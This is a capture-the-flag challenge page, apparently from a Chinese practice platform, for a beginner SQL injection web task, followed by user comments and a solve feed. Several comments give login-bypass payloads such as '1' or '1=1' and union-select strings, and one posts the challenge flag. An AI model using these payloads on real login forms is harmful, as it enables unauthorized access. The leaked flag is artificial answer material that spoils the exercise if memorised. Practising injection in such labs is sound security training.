my-first-sqliWEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 2433
提  示:
描  述:
My First SQL injection!!
评论
ycxsz 5月前

一点过滤也没有

回复 0

treasure11 5月前

数据库只要返回条件为真,就会返回flag 1' union select 1,1--+

回复 0

char2 5月前

这flag长得跟个假的一样

回复 0

xjh888 6月前

这有人用sqlmap我笑他一辈子

回复 0

yituoshi 6月前

Half the truth is often a big lie:shellmates{SQLi_goeS_BrrRR}

回复 0

2200394635 7月前

直接最简单的 1' or '1=1

回复 1

wclc 7月前

为什么注释要用--+才可以,我用的#爆不出来

回复 0
adminhrp 6月前

可能是版本或者sql应用不同,这里用--也可以实现,2个玩意都是sql注释

回复 0

18583024570 7月前

判读闭合符就能出来

回复 0

Y4n9 7月前

1'union select 1,2 --+,密码随便写,通过union select联合查询,看有无回显点

回复 0

hesh 7月前

1' union select * from users order by 2 --+ 密码框随便填一个

回复 1

WriteUp

image
thb143

0 金币

评分(5)

解题动态

13557576160 攻破了该题 2小时前
bachangxuexi 攻破了该题 5小时前
15113775193 攻破了该题 11小时前
czhf20120704 攻破了该题 15小时前
tartaglia 攻破了该题 15小时前
你懂的 攻破了该题 16小时前
3121252635 攻破了该题 18小时前
小白小白 攻破了该题 21小时前
Tao23 攻破了该题 22小时前
caicaiwoshishui 攻破了该题 22小时前
efls 攻破了该题 23小时前
gankJin 攻破了该题 1天前
q402207401 攻破了该题 1天前
z2122472 攻破了该题 1天前
mrzeng 攻破了该题 1天前
张友坤666 攻破了该题 1天前
Hibugku1 攻破了该题 1天前
2927183053 攻破了该题 1天前
bored 攻破了该题 1天前
changjuan 攻破了该题 1天前